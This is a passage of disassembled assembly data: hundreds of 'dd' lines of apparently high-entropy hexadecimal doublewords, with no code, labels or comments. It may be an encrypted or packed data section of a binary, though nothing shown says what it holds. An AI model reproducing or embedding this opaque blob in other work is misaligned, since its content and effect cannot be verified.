		dd 0B5CAE50Fh, 93E4A0E1h, 0D6DB2ADEh, 354072D8h, 930499Fh
		dd 40204970h, 47E43C5Ch, 8D04AE04h, 88DDBD8Eh, 6237067Ah
		dd 0C1D2046Eh, 18F211Ah, 24E344E0h, 0FA1A566h, 0D3D1C069h
		dd 347C6687h, 4540DE1Ch, 0CFD784EBh, 0C7EB2A5Dh, 0D0C4D398h
		dd 0A42F5813h, 8EB75516h, 45A7D02Bh, 3BD25548h,	0F9F070D5h
		dd 0BD4FEB02h, 0BB0BDB1Eh, 0DB8D5D4Bh, 2C5C06Ch, 70F44686h
		dd 0C0E48C2Fh, 0BC3CC49h, 0D05AA45Bh, 2E648052h, 13649D04h
		dd 2366332Fh, 50202E91h, 2E177293h, 50E1C2D2h, 98325838h
		dd 4EE02C18h, 0A03AFCDCh, 6ABB989h, 0C4AFC58Eh,	0F87A1031h
		dd 0B502B4F5h, 0BAC5058Fh, 1718E102h, 0AE153068h, 0B4DD80Fh
		dd 0ECD8B84h, 0F01C0208h, 0C5AA22CBh, 0B41BBE7Ch, 0DFD1F0FDh
		dd 98CD1B48h, 5B81B07Fh, 0C856DE06h, 0BFA12003h, 0A27036F3h
		dd 0A0C21BFFh, 0DAAF640Eh, 57B8182Bh, 4910CACBh, 0AA86E8Bh
		dd 12AD5EE8h, 7DB90C7Ch, 117577A6h, 8E2FCD76h, 6E9701h
		dd 0B3E00553h, 0BF0A3918h, 8AEF4358h, 0F3177C53h, 0CB05F149h
		dd 0B8734502h, 0B7F5C3FBh, 0BAD2ACBFh, 77FB5CB2h, 0D8D94432h
		dd 8F21BACAh, 0E6B176F5h, 0C36AFF84h, 8B5614BAh, 0B6D9EFE7h
		dd 2C1EC0Ah, 14A234ABh,	0B492E6AFh, 2541BE0Eh, 741262A1h
		dd 0E3D90316h, 77F320E8h, 0E057451Eh, 2ADF6C3Bh, 14D4A52Bh
		dd 57EB732Eh, 0D2F52C28h, 69CC7C97h, 7452267Fh,	1917D641h
		dd 0F6977E98h, 3348271h, 17916AB0h, 865DBF8Dh, 0EAEFB090h
		dd 92AC3B95h, 0A877A5A1h
		dd 6155FF41h, 0D4502AAEh, 0D594D508h, 9D51610Bh, 88A25C30h
		dd 285D0508h, 746A860Ah, 0D397AB57h, 61F016B5h,	0A50CBE04h
		dd 3751885Dh, 0A1A77EAAh, 0AF94EB2Eh, 5F3D4754h, 9EA237ECh
		dd 0DEB9A960h, 6BE12805h, 6E90DA88h, 3B9A93E5h,	0DCCC8512h
		dd 6C8A89EBh, 6115F80Fh, 3606207Ch, 3ABE93Ah, 4496FB10h
		dd 0ACAABF4Dh, 57376982h, 0A26599EFh, 688C03A2h, 34536A2Dh
		dd 1BC24595h, 858D338Bh, 0F0FC8A1Dh, 2636CEFBh,	0ECC0ABEDh
		dd 1999A832h, 343D55C0h, 0D3DA51DEh, 86467532h,	9C5AA592h
		dd 2B1B0775h, 0E26F95C6h, 0C13BA6ACh, 28ABFC5h,	3F2E1DD4h
		dd 5DCF2F80h, 0F74290BCh, 7C9EF983h, 50B4F5Dh, 0A7FFB554h
		dd 2D5E71E8h, 6FBECAD1h, 2A6FCF4Eh, 0A0C2068Bh,	641EC5E6h
		dd 7F07AD3Fh, 333D8531h, 408DD9E5h, 28B10E1Bh, 0D59E0D06h
		dd 2E50E339h, 0F5691979h, 4DF22154h, 0CD360263h, 1E45940Bh
		dd 5D5897F5h, 1749338Eh, 3164321h, 94310A8Ah, 0B6B36E54h
		dd 781969D9h, 6ABE3C97h, 52A06A69h, 2F2134D4h, 7B28E3EAh
		dd 0D8478D66h, 7BA94182h, 4F95A097h, 2029B7AAh,	0C5D240AAh
		dd 0ACB18BFh, 178335FFh, 0F5C3C2C1h, 0BE931118h, 7DAE02B9h
		dd 964D3785h, 2D95CE3Ah, 2295E954h, 8A52587Dh, 0F8946ABAh
		dd 46D181C2h, 6AF6296Eh, 0A28EAD51h, 52902660h,	0FCF0CA76h
		dd 0B3888053h, 9225167Fh, 0B94F7312h, 0A0A511C7h, 0FF695F5Eh
		dd 2C26B32Dh, 18BEE3E9h, 3E88A5Bh, 841109CBh, 0F8A8E415h
		dd 0EA786D32h, 0CD850270h, 0E78FBAE3h, 23305CBFh, 9330704h
		dd 7EFA3795h, 1AAC93F1h, 3E098B45h, 50A395ABh, 83899591h
		dd 926AC11Fh, 83EB9AB3h, 0B389B082h, 8EAA8216h,	5AF9471Eh
		dd 0B82E7BC4h, 0CB619EB9h, 0CF62F65Ch, 47D9B848h, 61586910h
		dd 0BA19E466h, 567E06h,	957D545h, 502B0082h, 1BF1BA4Ch
		dd 0A3942767h, 0BE647ABh, 672C6423h, 30C6F157h,	34A144Bh
		dd 0C3852C28h, 0B64DAA37h, 0BA4283BCh, 153E0144h, 0C2437FF7h
		dd 54C012D3h, 5DC61741h, 51572EB0h, 579911B8h, 353A3A19h
		dd 0F94C1DAAh, 0A6F2AAACh, 40592C8Bh, 0BE0C6168h, 5EA52C49h
		dd 69224DD1h, 0A2CB4044h, 0CF7E765Dh, 0C6DA95F0h, 0FE9457DEh
		dd 5F93DBC8h, 277F3B70h, 0CE955825h, 0D0215ACDh, 5552B822h
		dd 40C91367h, 728898E3h, 0B2E29927h, 0B8B63F9Ch, 62F895ABh
		dd 40172A5Dh, 8765DA34h, 0DC0A4A27h, 9E667C1Fh,	9D6A18Dh
		dd 0E6030127h, 3899ACE8h, 5E95B43Ah, 0D1B4BAAEh, 3CE97057h
		dd 73565235h, 0AB5A3F29h, 0E402DB58h, 7512A084h, 14141D29h
		dd 60F71824h, 0F22DB0BFh, 0C57B0BB6h, 933E518Ah, 38768783h
		dd 9C396000h, 2BAC1968h, 0A1DE41C0h, 8390B5ABh,	0E2C3018Dh
		dd 0D62CE350h, 4460961Eh, 176A0F1Ch, 0C5AAABAh,	6237DA08h
		dd 0ACD4FBFh, 0B829C001h, 5C052386h, 0A14D68CEh, 0A24A00DBh
		dd 0F69258FEh, 39182068h, 0EF6304E8h, 3595C42Dh, 576F7080h
		dd 0B782C022h, 0A59B852Eh, 0D00297DBh, 63721995h, 0DB80080Eh
		dd 6D8888D5h, 85B0851h,	0CC7E596Dh, 0BB86C99h, 0B0471730h
		dd 4068BDAEh, 893571A7h, 25004C33h, 6B9028EFh, 7F2107Bh
		dd 60C07EAh, 0DA2ED550h, 3DD96258h, 38D90155h, 61D8F16Ah
		dd 0BC3C3F3h, 19C0503Eh, 6026ABB7h, 0F1521CCCh,	7013753Fh
		dd 8051EBA0h, 0A0F98A17h, 46619CE8h, 0A50E0701h, 0B542587h
		dd 0A295A503h, 6B030842h, 2F429B40h, 3B86720h, 68A427E8h
		dd 5E74BC6Bh, 41F4CF9Bh, 75261DCDh, 22C395DBh, 5DD0AA03h
		dd 0BF03ACFEh, 0A16D3AE9h, 28F82322h, 19CA61FEh, 4AB45400h
		dd 795C2E73h, 95F7F092h, 8CF3CE6h, 0CD6F3104h, 24595D95h
		dd 0B944CA2Ah, 64295238h, 0B80D6ACEh, 539AAFCFh, 3E907055h
		dd 9278611Ah, 68B0556Dh, 0F2AA03CDh, 0E71561Ch,	0B6703C78h
		dd 81D9D009h, 23A24ACBh, 83E063D6h, 25789C89h, 17DC26Ah
		dd 0EA53056Ah, 40067F53h, 80DFC29h, 0A754D59Fh,	8CAA290h
		dd 28B81F76h, 2843AA5Fh, 3691A4CDh, 121E5A43h, 98E81505h
		dd 0A1B1C1A3h, 0F4147BCCh, 3BEEF682h, 0DD6333A0h, 681D200Ch
		dd 0D2583838h, 898FAAB4h, 1AC3FE36h, 0D59535A7h, 0AC13E0ACh
		dd 54C758F9h, 9F94147Ch, 72777218h, 771FD5C3h, 4637C3BAh
		dd 9B972ACFh, 4CD0BDAAh, 22A5882Ah, 4181C4CFh, 0C321BCA9h
		dd 9416AB9Dh, 259D1054h, 92B32415h, 6114B8CAh, 135D8965h
		dd 78176803h, 0FDABF22Bh, 3BACD18Ch, 6926775Ch,	14E7711Eh
		dd 523D68C5h, 9855AF21h, 0C07113BFh, 3059DD3Ah,	5DC5388Fh
		dd 0D528CB09h, 420F4312h, 0D7CABB05h, 0E4E2184Bh, 903217CFh
		dd 8DB43F75h, 0A85AAF5Ah, 816799F0h, 58151C6Ah,	9BD57377h
		dd 0BB6B346Ah, 29CC59E2h, 0BA94AE6Ch, 0ACDAFD2Ch, 0F92D5948h
		dd 501ED714h, 45B25405h, 45B50120h, 8A977BC4h, 56F3D2F0h
		dd 0DAFB5843h, 2DA8416Ch, 0A17028C7h, 0D9D959E0h, 8705A454h
		dd 9567D4C4h, 0CFB55869h, 408701AFh, 0C1C21A19h, 0DE7DE174h
		dd 0F81E0A5Bh, 6316707h, 24CE0973h, 2E3673B2h, 174A09C8h
		dd 203A7985h, 0F6BE1B14h, 7077823h, 771D04A2h, 4D1FF5C1h
		dd 92FF09DBh, 0B22F6A04h, 0BA2975A2h, 514FF980h, 638549ACh
		dd 30FAB0DBh, 0B17F6EB2h, 0C5DCDD72h, 0E8A8C6Ah, 32B6084Bh
		dd 84712C4Ah, 2CF0EEC0h, 7E284627h, 0CA4AB45Eh,	8360455Ch
		dd 0F27F4451h, 191C24B4h, 879EB438h, 61C0F07h, 5E8B9311h
		dd 195159A2h, 86BDFFF7h, 94DE2247h, 3E4B2FA1h, 0E54D51B5h
		dd 6F71D34Eh, 48A21515h, 0B1D4743Bh, 782EDEF8h,	0C380BD34h
		dd 36BA7F18h, 72EB3CBDh, 51813ECCh, 6CF46B24h, 2A9B1020h
		dd 0C7B47B9h, 0CB7BF56Dh, 0FC7B783Dh, 7D728669h, 0FC664D1Ah
		dd 79EA84B0h, 4383E937h, 55D5DFE2h, 0E76BB004h,	690B2F31h
		dd 0BEC17D90h, 0D7110BC0h, 0A38E44B7h, 2AA0C5D1h, 0D89B8064h
		dd 0C86B9B2h, 6D1FF1F0h, 661162F8h, 516B2D7Bh, 5F9D4531h
		dd 0C862C454h, 0D0A0A0D5h, 53CBD455h, 0F7F89938h, 88825F75h
		dd 0D68F0556h, 0AB8BE10Eh, 14EABFAFh, 0AA245B8Fh, 3F0A94BBh
		dd 83A29422h, 3AC9C586h, 64149014h, 832AA283h, 0CB668E03h
		dd 3A32B415h, 8BFC14F0h, 9C181A75h, 4215F946h, 82E2F838h
		dd 0EA30D35Ch, 7BF56024h, 0AE9D432Ah, 4ACA5C4Bh, 9349F6B0h
		dd 197485FFh, 54D3CDF6h, 9835EF6Eh, 618A6E0Ah, 0F0FA25D9h
		dd 8F677BBh, 28A66A9Ch,	51CD887Eh, 57D1FB3Eh, 8D022455h
		dd 8EF1AEAFh, 6996AC7Eh, 4A804A29h, 99D888BEh, 0F262CD6h
		dd 6DAB40AFh, 0BA16E114h, 0E2A80BF6h, 8D567C98h, 0EF23A2F1h
		dd 9747C99h, 7145A539h,	6DCFE4Ch, 804784C5h, 0D66EB53Ah
		dd 0EB85908Dh, 2956E041h, 0CA4C3E3Dh, 38341D57h, 5972842Eh
		dd 2E3359B9h, 47C42EF6h, 2A3F4075h, 5D84C1ABh, 4F16347h
		dd 6B445076h, 0EF22E87Ah, 4CB668EAh, 0BF2D68D5h, 3116A149h
		dd 51905965h, 0E18367E6h, 21F8B637h, 9E11FEF8h,	41A17CFBh
		dd 0F154F8ECh, 513127C4h, 0CB7D0A1Ah, 1DAA7FD2h, 0BCEB5D08h
		dd 0C2803C03h, 0AB361AF8h, 501153ACh, 50BAC9A1h, 7EEB15FBh
		dd 17C5C3A7h, 0D659A413h, 2F1F5C0h, 50642815h, 4708E04Ch
		dd 8CE985D5h, 0C150F4EFh, 47C1AE03h, 0E53C683Fh, 3386F1E1h
		dd 9B70FF05h, 0E49AEDEEh, 965E0BCAh, 0B54A7305h, 1B5540E1h
		dd 0EBAEFDD2h, 7505C16h, 338607D7h, 0B1110DB1h,	22E079Dh
		dd 86435694h, 8058B2B5h
		dd 0A8F121Ch, 8ABDE630h, 8A882A90h, 0C4414EADh,	0B79BEC8h
		dd 4C257B7h, 739FBB8Ch,	8A1E9643h, 0F8D07069h, 0AE983E0h
		dd 88819D7h, 3306175Fh,	2EBF69E8h, 0AF8990A4h, 84C2317Ch
		dd 49AF870Dh, 8F61975Fh, 3C97EFAAh, 21A98161h, 0EBBE4942h
		dd 8186D712h, 0C59B3541h, 0E082CC60h, 0FFAFFF83h, 1BB29BEh
		dd 3CEC5619h, 0B8DA8AE1h, 35E15B22h, 0E0343970h, 6368E2F8h
		dd 0DF0CD20Eh, 48FF5FFAh, 2C80B692h, 98A526C6h,	46833819h
		dd 0F017E4F1h, 0EFBFB1C1h, 6FAE57AEh, 542B09FCh, 7A39915Ch
		dd 0EEF5066Ch, 615266B9h, 85F6E151h, 0BE1FEBEBh, 10AB2AF8h
		dd 985607C7h, 95F0121h,	4FBCFC66h, 3F89F8Dh, 0E0FECF97h
		dd 2C4413FCh, 93E32D10h, 13031DE7h, 1240724h, 1C92E123h
		dd 0D3A65AEBh, 0B90880F5h, 119C88A4h, 257A37E6h, 6DCB019Eh
		dd 0FE4EBF5Bh, 17701742h, 99F18B5Dh, 0B6E532F7h, 0FA0A9593h
		dd 6CA2E7E0h, 0DC4A94D3h, 53D7A09Bh, 86B40C97h,	0E0E1960Bh
		dd 0EA67C2DFh, 460601DFh, 0F0BCF111h, 13248655h, 66C8987Eh
		dd 0A8E92E35h, 0CD603B2Bh, 229F7DF8h, 0D3858A39h, 0FF002707h
		dd 93A8C1DEh, 851C7BEBh, 629E9CD8h, 0A7C3CE39h,	0C97B9C24h
		dd 5F280C19h, 60E1517h,	90787005h, 489BBFE2h, 0FE4FE077h
		dd 0AE8F13E2h, 0F91027ADh, 270F6BA2h, 0BEBAD8Eh, 916CEFC7h
		dd 0F951A459h, 162EC60Ah, 16C40416h, 5650BEA1h,	0DFB05CBCh
		dd 2C20770Dh, 31706607h, 5E63731h, 0E1C04882h, 0D068EB3Bh
		dd 42C4286Ah, 8B0D1F41h, 52A1E11Ah, 161C4413h, 0CD12377h
		dd 12CA58Bh, 6430E51Bh,	9142FF8Ch, 3D710880h, 88D2D03Ch
		dd 14C38C0Fh, 8D04DD00h, 856D9222h, 3D2599F4h, 1EC1D601h
		dd 7193615Eh, 0F17983F0h, 87E127F4h, 318D1B14h,	0D7096EEEh
		dd 0E4A76CA3h, 9EC32C55h, 61DA10Ah, 0D475B450h,	2CEC456Eh
		dd 0F7703400h, 0E7AB3BC4h, 8B43E41Fh, 0A536590Ch, 3F67F6DCh
		dd 78D4C91Fh, 0B42F01E9h, 0B9089520h, 9D6BDCEBh, 92AB8C51h
		dd 80E45142h, 1602D4C2h, 8F5C3443h, 2A352A11h, 40821542h
		dd 33ED42C5h, 0C189F3E1h, 8607E2F9h, 8AA643E9h,	40ECBA07h
		dd 58BE4D5Bh, 0D9DD7Ch,	406ED35Eh, 0FC083216h, 830AA074h
		dd 74A1A195h, 6C731602h, 227091E3h, 0BFCC8D02h,	2CBA4DA9h
		dd 4FD648A0h, 46694AF8h, 59FBF57Eh, 40B2FCDFh, 74AF0117h
		dd 97177C6h, 0B174C5D0h, 0BF045435h, 4CE60861h,	0F040417Ch
		dd 0FFE2E465h, 2903585h, 96255539h, 7AC1C6F8h, 8FB2157Ah
		dd 48BEDF62h, 14077926h, 6FBDBC0Bh, 4A032316h, 0F03B1A18h
		dd 420A893Bh, 8F8FDFBAh, 0EED9D7Fh, 8804A7AEh, 5618011h
		dd 6242607Ch, 7C5C1A5h,	313AE941h, 22E25A7Ch, 6B7387E3h
		dd 8F87033Bh, 0F45BF6BEh, 8695E0CDh, 365230EEh,	19F5FFFh
		dd 5749C83Ah, 901875Ch,	0BE9E4DFAh, 0D52D9F13h,	218B95F7h
		dd 5DDAC3C1h, 0FA5C188Fh, 60B775Dh, 1748A92Dh, 4297A376h
		dd 0EA934AFAh, 84E6536Dh, 7ABBA28h, 2A3492A8h, 6AB1A06Eh
		dd 341B5D62h, 7E1A44FFh, 0A5017229h, 876236CFh,	9EB9A28Ah
		dd 74275219h, 59064057h, 42C980CBh, 0F2E18C4Ah,	408CFC22h
		dd 5B324D04h, 5166C440h, 0BDBA59Ah, 9CA26CB3h, 7AE65848h
		dd 81381C8Ah, 43DD2A25h, 0E8C7EC9Ch, 59BC0AA7h,	0B006145Ch
		dd 0CBC80913h, 710428B9h, 58D7681Ah, 1543AD44h,	9FC14631h
		dd 920CDCF5h, 5F0DD3A1h, 21EB5979h, 0E80CB792h,	89CFE101h
		dd 0D0227BD5h, 17AEC228h, 7DEBEC40h, 4152C427h,	0FC62A4ADh
		dd 8BB72863h, 0FF71481Eh, 745310B9h, 25C59DAFh,	0A88AD9Ah
		dd 16BE62C6h, 0F39DC5D2h, 0D2F6D86Dh, 1468FE2Eh, 0D35ECE76h
		dd 0EA8EC235h, 0FE84C588h, 122F2500h, 55A1EAB2h, 4D7C18CAh
		dd 0DDE1DABDh, 6A2D1F52h, 44BD1995h, 33972E33h,	44997886h
		dd 0D4598FC7h, 2E178112h, 5429D127h, 1413744Bh,	15F272B9h
		dd 880D4ED4h, 0F7B892F4h, 8B3864D4h, 5A93FA2Ah,	0B90DD76Bh
		dd 4904F7B1h, 92E07572h, 893D5B4Ah, 0AC3F23E0h,	9259016Bh
		dd 4010B33Ch, 2FE8B170h, 0AA4CC1F8h, 85A27E0Ah,	0AC8F0141h
		dd 0F82D862Fh, 0E511CCD5h, 0A89E6CC5h, 20045D82h, 5CFA010Fh
		dd 14BF7F08h, 41FC1340h, 9FF47000h, 5CADAC01h, 0A95D6103h
		dd 0DFFC4ABDh, 2F972993h, 0F9F22C07h, 0A188D048h, 60598E4Ch
		dd 0DF3B5FE1h, 0C302D676h, 0FEF6A263h, 0EC81C977h, 44316775h
		dd 0B331B48Ah, 5C283546h, 0C2007D43h, 54D9A012h, 49724608h
		dd 0BF6856C3h, 0B07A1100h, 70B82504h, 7C817B08h, 16C83061h
		dd 684A525h, 5F23225Bh,	43334D02h, 2F80358Eh, 0E785F168h
		dd 12C1546h, 0A1A01DE0h, 0DAE2190Ah, 0B2AC9E08h, 0E7627283h
		dd 6AF5A12Fh, 6AEC7420h, 19E8D62Eh, 8D32018h, 599E1A50h
		dd 4B86B57h, 1F548678h,	1C521DC0h, 3D1828AAh, 21112070h
		dd 0BBA04A16h, 0AEC47C19h, 631114C3h, 0FED9DF66h, 0BC1CE82Fh
		dd 1AB37A72h, 0B05A593Eh, 75EA416Ah, 0E6CB2311h, 0FA6A151Dh
		dd 0A3B720E9h, 2EE51253h, 8EFFF947h, 0CFFF79B0h, 620917B7h
		dd 24364C1Eh, 0E5B2F08h, 0B2A6D512h, 0E3629632h, 60706D74h
		dd 0ABA167D5h, 3043B404h, 10FA20E8h, 3C6282CEh,	0A6612730h
		dd 0ECE8E8CAh, 621E05Fh, 0BDFBF70h, 1F3F0876h, 448BA198h
		dd 2EEBFEFEh, 0FFA014B6h, 3607E0C1h, 74635748h,	42939E45h
		dd 0F3550FD3h, 3E1682B8h, 0B85E7B10h, 7C00266Bh, 0DE28834h
		dd 57901539h, 0DE2400D4h, 0B017893Dh, 6E86D0A9h, 24CA999Fh
		dd 1422EA38h, 69DCB2D0h, 4614D51Ch, 8B7019Ch, 0AA6711E2h
		dd 0BBC78FE0h, 0F5088043h, 0C8658325h, 8D22DA5Ah, 0C2F865A1h
		dd 2DD95A3Ah, 0C05D6CDEh, 826CBEA5h, 0CF7CDC0h,	84A69A60h
		dd 0B650D8DCh, 0F500E96h, 996195D2h, 0C6CB623Ch, 7A6F2BBBh
		dd 3B521FBh, 351703D7h,	0D0A442ABh, 812F6AF2h, 0C483EA03h
		dd 0F0299631h, 831B077Dh, 16D4A41h, 5D8B5D88h, 0A3757AEh
		dd 0C4D3A2FBh, 0A887909h, 786A7A95h, 0BB2926F7h, 4B757158h
		dd 5B3BC4Fh, 95282463h,	4A26289Bh, 55779C8h, 0BAC5E998h
		dd 0E162FBF5h, 0BDDB026Eh, 52063E5Dh, 5D1CC938h, 0F7E0B97Ch
		dd 21AC3209h, 66DAE53h,	0A7305407h, 0F7C17312h,	917B8975h
		dd 1CC557BDh, 4B92F718h, 8E06C077h, 7E7A72E4h, 0ADB102E4h
		dd 992F309Fh, 4D4A20E8h, 44C04192h, 205E48Ah, 0E36875CEh
		dd 6A56EBE6h, 51F2606h,	0FA8BB2F0h, 9F8BE45Bh, 24AB7F13h
		dd 15ACD95Ah, 18CF2CBAh, 0A2DCEFBDh, 4AADF6DEh,	261547CFh
		dd 0FE5720CAh, 0BEC4F024h, 959BAE86h, 99806105h, 57FED281h
		dd 0CFAE87h, 52BEBF0h, 5C97221Eh, 129A0D62h, 3470520Ch
		dd 89598D4Ch, 5AE97C02h, 0B8910DC7h, 0BB80A06Bh, 68EE8308h
		dd 7FFCE14Bh, 0C2AC58CAh, 0F04915B0h, 6F05670h,	0C0622018h
		dd 1EF0700Fh, 0F1154D51h, 423A0673h, 61A329h, 0D095F462h
		dd 2DAFD7BDh, 83F0B64Ah, 4D18B619h, 0A4273621h,	20074A09h
		dd 4A0DA8CBh, 1CD1A767h, 2029BAB0h, 455F38F6h, 5BC1A0D1h
		dd 0D34F0B99h, 571C1F58h, 83358C8Dh, 0BCB546E4h, 5BF8545Eh
		dd 0C569DE1Dh, 9F39AB31h, 7F2D089h, 8720734Dh, 150CACEFh
		dd 577E0643h, 4C765091h, 5938A642h, 6FB08B98h, 0E331A9E0h
		dd 6E29891Ah, 1167589h,	0EB02B47Ah, 577B9B43h, 0CBD8CA75h
		dd 0EE5EAE0Eh, 7B5D72F8h, 0C2674185h, 0F6571FE4h, 0C8B9C171h
		dd 2A11CFCBh, 0E166DC8Bh
		dd 465FADE5h, 517CE8A3h, 0C25F00C0h, 0C030010Fh, 38BBC501h
		dd 0E520296Dh, 8A24D62Ch, 7220BF3Eh, 0E02C60A0h, 62202A27h
		dd 5E0A7300h, 20AB8741h, 0CCA86C01h, 0FE60EA21h, 755E03CFh
		dd 0BC854EAAh, 8BA9AB2Ch, 8627C6F6h, 593B20B2h,	3ECB6312h
		dd 7D3D709h, 8C3F2869h,	25214194h, 9A5D8A35h, 0D94B4082h
		dd 84B37515h, 20CBB947h, 24575D22h, 33EBC739h, 0B52EC486h
		dd 99FB613h, 6006B320h,	0CB8FFB84h, 2F2E288h, 3C086910h
		dd 1245EA36h, 5828A5EFh, 2E90A08h, 22C0A90Dh, 0C7F260FCh
		dd 91AE48D6h, 5DB4A168h, 1C43E153h, 82586179h, 0D720F8B1h
		dd 1B96C092h, 0F51B5890h, 30979D51h, 90BF1A8Eh,	2DC17599h
		dd 0EA937BD7h, 59F4FFBFh, 29C589F2h, 0BE04A6FFh, 0C10278D6h
		dd 0E6915207h, 0C167C884h, 5F8B04BEh, 24A56D90h, 2BAA0454h
		dd 0F0EF344Fh, 4E501B03h, 28C792D1h, 45A1C245h,	7E19A60Ah
		dd 16F939DDh, 16107782h, 5E50DD99h, 0A956716Ch,	4C1947C1h
		dd 0CC22E94Ch, 8076467Eh, 88BF51A0h, 3BDE6760h,	9844534Ch
		dd 0C2E9B859h, 0DA7BEDC5h, 97540950h, 0CC44BCF8h, 0EC35E0AAh
		dd 611094Ch, 4C4EEEB1h,	990D29D0h, 6BC22010h, 0BA43C0ECh
		dd 0D2F077F1h, 3EF29F44h, 505A8086h, 0CF5CF8D3h, 4CA78302h
		dd 254CBADCh, 0E66D01E8h, 237C834Bh, 6FA3E12Ch,	5731654h
		dd 38886DD4h, 0FE1C24BAh, 47EF1FA6h, 36F88C96h,	0F16141AFh
		dd 0D08DAA32h, 0E2F9512Ah, 0E309F2CFh, 0B65D0188h, 32A11CECh
		dd 0E44AC16Fh, 64326438h, 4142B9Bh, 328C5674h, 852E72B1h
		dd 0DF265FA2h, 0E7BCEF4Dh, 3C0E4712h, 8C6642E9h, 447D2C77h
		dd 8D9DFD6Ah, 351542E1h, 0A436CD02h, 0CA2B1D9Bh, 5441BECCh
		dd 33E6A2E3h, 8AB847E1h, 97FAAD58h, 0E3CBBF46h,	0C47F5D1Dh
		dd 0D86F47E8h, 0AD4FB79Bh, 6A3B92E2h, 9AF67800h, 0BD44DC44h
		dd 0C8A91127h, 0F43ACD8h, 771D1B90h, 0FC177E80h, 25E4E800h
		dd 7889988Dh, 0F05F234Bh, 16026731h, 238C24Ah, 824DB9ECh
		dd 0CFF219Fh, 0BE03442h, 8F05010Bh, 8BBC6AABh, 41D89C01h
		dd 802A368h, 6612A2Eh, 1C008780h, 24E12A64h, 0EB6228F2h
		dd 80CDFCA5h, 2FE70BDh,	0F2833968h, 1D2E24Eh, 33B968E6h
		dd 9A3BFE99h, 6884E638h, 1177CB69h, 73D750Bh, 2B89971Bh
		dd 56810862h, 97740312h, 96E97277h, 0AE925318h,	0A09C1400h
		dd 522D2C1Fh, 16B057DFh, 0AD0E4885h, 81581E81h,	22486E20h
		dd 8914406h, 7DA9C5A1h,	5A61032h, 0C0DCEDECh, 0E2BDAC5Fh
		dd 5317CD46h, 26FD1C3Fh, 0C84228FEh, 46340400h,	56000ED5h
		dd 82CEB443h, 52C49B8Bh, 8AC6C9C4h, 0BA1DE362h,	0F7C63110h
		dd 0A1CB36EBh, 84C5E3A3h, 6222BE6Dh, 7028450Bh,	33E9341Ah
		dd 4FDA3ECAh, 0A8F9296h, 16A72472h, 63B96607h, 86B05757h
		dd 0A5FA7FBEh, 0FA1F368Bh, 0BCB66FC3h, 305C84F7h, 0D4099883h
		dd 0E5F4C35Fh, 499FDF1Eh, 0B0A0C551h, 0BA4AE071h, 0DC5C8520h
		dd 0C800F1B5h, 0B9423F6Dh, 0F068C3EFh, 6E52458Fh, 0D6A9150Ch
		dd 0F1531A0Dh, 0A8190549h, 0BAF6A878h, 0AECB40C8h, 9819143Ah
		dd 0DC08F331h, 0C875A80h, 0BF1A3995h, 6EA6F6DCh, 0B302399Fh
		dd 0C3EC0C20h, 5BE142AEh, 81206432h, 0D013EDAh,	443A231h
		dd 79F84D2Dh, 0EDE90589h, 77834887h, 43B08320h,	0D1D801BAh
		dd 63B006A0h, 71108629h, 748A54BDh, 11044C31h, 60EAA248h
		dd 0EB846710h, 804E8509h, 0C1F571B0h, 0B860DBEDh, 960CD371h
		dd 34CF3A7Dh, 24CFAC0h,	0A6379329h, 5A85D54h, 0D56A090Eh
		dd 0FDC61F40h, 0C1284183h, 0AF446EF0h, 41EB870Bh, 0FF40C70Ah
		dd 10EA87E0h, 0D888887Dh, 7C65EA2h, 0CEF87AEh, 0E2E20B0Ah
		dd 2F259F72h, 97ECF1AAh, 38077D56h, 2500F17h, 0E55AAEF3h
		dd 1F8D22EFh, 1BA5CF34h, 748E0ABBh, 0F6C51EE1h,	1777E0EFh
		dd 0D6296203h, 3A65B43Eh, 0EB542074h, 1E5856F3h, 4132357Ch
		dd 57672355h, 5C17735h,	0B349C49Bh, 1F9A58D3h, 0FF2C8C5Fh
		dd 0A78B1F81h, 4684348Fh, 347B3A89h, 2EC325B1h,	770E462Ch
		dd 4AD742Bh, 0EBC7D9CBh, 650DF7D5h, 14572AE2h, 28AE5F15h
		dd 832A43BCh, 1D8285DDh, 0D51E4B13h, 40892AF2h,	4730E3C1h
		dd 0F635C3A8h, 2781892Ah, 0EB124545h, 3109485Ah, 60B96235h
		dd 16A87AFBh, 208CFC43h, 0BE222C50h, 0ED5B3B9Eh, 0B97FBA14h
		dd 863B750Ch, 5DA98CB4h, 0B9158155h, 0A24791D6h, 871CCD61h
		dd 0AF77F138h, 479954A5h, 0AF1F053Dh, 39DCCC02h, 0E4BC051h
		dd 0D8646814h, 9EFC3FFDh, 0E5EB3D30h, 0F4450626h, 65B659D8h
		dd 84947FBDh, 0A1C5B21Fh, 438E8F0Dh, 0E536DB1Bh, 0A84F559Fh
		dd 553D99F4h, 7EAEE2CDh, 50FC8981h, 0F960D733h,	0E70032E9h
		dd 58DB2FBEh, 150ECE7Ah, 181CAFBFh, 0EDA836BBh,	103C248Bh
		dd 0FDF3DFF0h, 0A0113A37h, 0DB5F23BCh, 0D187E411h, 0B1D82660h
		dd 9EB9831Bh, 8CEC28D5h, 352562Ah, 867DA34Ah, 0DE0C7C01h
		dd 380E6A01h, 24EE5603h, 301AB08Ah, 227A3A27h, 0C3643AADh
		dd 0E5D69711h, 86BFB013h, 83E31A14h, 5E0E119h, 72F42E0Dh
		dd 1478820Bh, 850DDEF1h, 91BC7286h, 6A83571Eh, 0C307D283h
		dd 50C6624Fh, 6B568220h, 0C6829048h, 0C0AD6C5Ch, 2AEA54E4h
		dd 4C230095h, 415FA108h, 0A64B8ADh, 2281B3B8h, 0DDBE0D4Bh
		dd 7EFF3BE0h, 859AC2E3h, 5438B5E1h, 0FCDC2A5Fh,	2540F6E7h
		dd 0A0812908h, 0AB8A4BBh, 0A9C24382h, 0BCB9A694h, 7CBD1571h
		dd 0D94E9679h, 5520A21Eh, 3FC866AAh, 63AA7064h,	0C3B52B82h
		dd 160522EDh, 4A6F452Dh, 0D9B8509Dh, 0DC5780C2h, 375FA4F1h
		dd 5D40EFD4h, 0BEDFB414h, 288486F9h, 7D4950D0h,	243655D4h
		dd 59C503AEh, 0E663ABD3h, 55DF615h, 72F20946h, 27EFCE21h
		dd 0C1C8BB86h, 0FE0EE7A5h, 0B6B2DD52h, 0B3EA6BF5h, 0C082AEC4h
		dd 3FF761DFh, 0DCCABAF7h, 0E1E96B42h, 0CEF3BC5h, 7AD0EADDh
		dd 3D5B1975h, 0F5DBB179h, 40836AFFh, 91B8D0B8h,	0D40473D4h
		dd 0A9382B8Bh, 499A0D3Bh, 704087A3h, 331838A3h,	198E4108h
		dd 0FD4686h, 20B724A0h,	8B65157Eh, 287D882h, 7E023286h
